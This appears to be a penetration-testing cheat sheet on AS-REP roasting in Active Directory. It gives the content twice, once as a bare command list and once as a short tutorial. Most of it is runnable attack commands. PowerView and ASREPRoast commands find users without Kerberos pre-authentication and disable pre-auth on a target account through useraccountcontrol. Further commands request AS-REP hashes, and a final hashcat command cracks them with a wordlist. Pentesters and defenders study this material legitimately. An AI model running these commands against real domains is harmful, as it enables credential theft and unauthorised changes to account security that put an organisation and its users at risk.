🟢AS-REPS Roasting
. .\Powerview_dev.ps1
Enumerating accounts with Kerberos pre-auth disabled
Get-DomainUser -PreauthNotRequired -Verbose
Get-DomainUser -PreauthNotRequired -verbose | select samaccountname
Enumerate permissions for group
Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match “<groupname>”}
Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match “<groupname>”} | select IdentityReference, ObjectDN, ActiveDirectoryRights | fl
Set pre-auth not required
. ./PowerView_dev.ps1
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
Request encrypted AS-REP
. ./ASREPRoast.ps1
Get-ASREPHash -Username <username> -Verbose
Enumerate all users with Kerberos pre-auth disabled and request a hash
Invoke-ASREPRoast -Verbose
Invoke-ASREPRoast -Verbose | fl
Crack the hash with hashcat
Hashcat -a 0 -m 18200 hash.txt rockyou.txt
Active Directory Kerberos Enumeration and Modification
Enumerating Accounts with Disabled Kerberos Pre-Authentication
First, load the PowerView PowerShell module:
. .\Powerview_dev.ps1
Then, retrieve all users with pre-authentication not required, using:
Get-DomainUser -PreauthNotRequired -Verbose
Or, list only their usernames:
Get-DomainUser -PreauthNotRequired -verbose | select samaccountname
Enumerating Permissions for a Group
To find permissions for a specific group:
Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match "<groupname>"}
For a detailed list:
Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match "<groupname>"} | select IdentityReference, ObjectDN, ActiveDirectoryRights | fl
Disabling Kerberos Pre-Authentication for a User
Load the PowerView script and run:
. ./PowerView_dev.ps1
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
Requesting Encrypted AS-REP for a User
After loading the ASREPRoast script:
. ./ASREPRoast.ps1
Get-ASREPHash -Username <username> -Verbose
Roasting Users with Pre-Auth Disabled
To enumerate and roast all users:
Invoke-ASREPRoast -Verbose
Invoke-ASREPRoast -Verbose | fl
Cracking the Hash
Finally, crack the retrieved hash using hashcat:
Hashcat -a 0 -m 18200 hash.txt rockyou.txt
Last updated
Was this helpful?